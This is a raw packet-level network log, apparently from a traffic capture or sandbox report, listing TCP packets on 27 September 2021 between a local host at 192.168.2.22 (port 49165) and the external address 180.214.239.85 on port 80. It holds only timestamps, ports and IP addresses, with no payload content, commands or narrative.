                                          Sep 27, 2021 14:04:15.798461914 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.798479080 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.798511982 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.798583984 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.798605919 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.798614979 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.798624992 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.798641920 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.798660040 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.798721075 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.798743963 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.798753023 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.798774958 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.798820972 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.798851013 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.798930883 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.799006939 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.799036026 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.799060106 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.799069881 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.799083948 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800026894 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800043106 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800054073 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800081968 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800103903 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800107002 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800128937 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800152063 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800173044 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800196886 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800198078 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800213099 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800215960 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800236940 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800239086 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800254107 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800257921 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800273895 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800276041 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800292969 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800295115 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800311089 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800314903 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800329924 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800334930 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800345898 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800357103 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800362110 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800379992 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800390005 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800400972 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800416946 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800424099 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800431967 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800446033 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800457954 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800467968 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:15.800479889 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:15.800493956 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.140003920 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.140048981 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.140073061 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.140094995 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.140105963 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.140137911 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.140141964 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.142345905 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.142391920 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.143913984 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144180059 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144181967 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144208908 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144210100 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144213915 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144224882 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144241095 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144248009 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144270897 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144284010 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144296885 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144311905 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144325972 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144336939 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144352913 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144367933 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144378901 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144398928 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144406080 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144418001 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144433022 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144447088 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144464016 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144469976 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144491911 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144505978 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144515038 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144535065 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144540071 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144551992 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144565105 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144579887 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144587994 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144599915 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144615889 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144629955 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144639969 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144655943 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144670010 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144679070 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144695997 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144711018 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144721985 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144730091 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144747019 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144761086 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144773006 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144783974 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144798040 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144813061 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144824028 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144839048 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144850016 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144860029 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144877911 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144891977 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144906044 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144918919 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144932985 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144948006 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144958973 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144967079 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.144984961 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.144999027 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145006895 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145018101 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145029068 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145047903 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145052910 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145066023 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145077944 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145097971 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145104885 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145116091 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145128012 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145148039 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145153999 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145164967 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145175934 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145196915 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145199060 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145212889 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145220995 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.145235062 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.145258904 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.147686005 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.154396057 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.154436111 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.154454947 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.154479027 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.154501915 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.154525042 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.154565096 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.154589891 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.154589891 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.154620886 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.154623985 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.154639006 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.155610085 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.155642986 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.155689001 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.155704975 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.155708075 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.155710936 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.155731916 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.155754089 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.155755043 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.155774117 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.155791044 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.156810999 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.156845093 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.156891108 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.156896114 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.156920910 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.156929016 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.156941891 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.156958103 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159460068 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159502983 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159539938 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159553051 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159563065 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159594059 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159612894 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159641981 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159670115 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159687996 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159701109 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159713030 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159727097 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159735918 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159754992 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159758091 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159778118 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159781933 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159797907 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159804106 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159813881 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159826040 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159845114 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159846067 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159868002 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159885883 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159897089 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159909010 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159929037 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159929991 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159946918 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159951925 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159966946 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159976006 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.159985065 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.159998894 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160017014 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160022974 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160034895 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160044909 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160063028 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160068035 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160079956 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160089016 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160106897 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160115004 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160129070 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160135984 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160145998 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160156965 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160172939 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160176039 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160196066 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160209894 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160228014 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160233974 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160244942 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160262108 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160271883 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160289049 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160300970 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160311937 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160330057 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160335064 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160351038 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160358906 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160366058 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160382032 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160399914 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160406113 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160428047 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160429955 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160444021 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160456896 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160465002 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160481930 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160500050 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160505056 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160515070 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160527945 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160543919 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160551071 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160563946 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160573959 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160592079 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160598040 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160610914 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160621881 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160640001 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160648108 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160655975 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160674095 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160686970 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160696030 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160720110 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160720110 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160733938 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160753965 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160788059 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160811901 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160830021 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160835028 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160847902 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160867929 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160893917 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160918951 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160936117 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160942078 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160954952 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160964966 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.160981894 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.160999060 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.161004066 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161041021 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.161664963 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161737919 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.161757946 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161784887 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161803007 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.161808968 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161823034 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.161833048 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161844015 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.161858082 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161875963 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.161881924 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161905050 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.161921024 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.161938906 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162031889 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162056923 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162080050 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162081003 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162098885 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162108898 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162117958 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162134886 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162148952 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162158966 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162168980 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162183046 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162199974 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162205935 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162228107 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162244081 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162261963 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162266970 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162277937 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162290096 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162307024 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162316084 CEST8049165180.214.239.85192.168.2.22
                                          Sep 27, 2021 14:04:16.162326097 CEST4916580192.168.2.22180.214.239.85
                                          Sep 27, 2021 14:04:16.162342072 CEST8049165180.214.239.85192.168.2.22
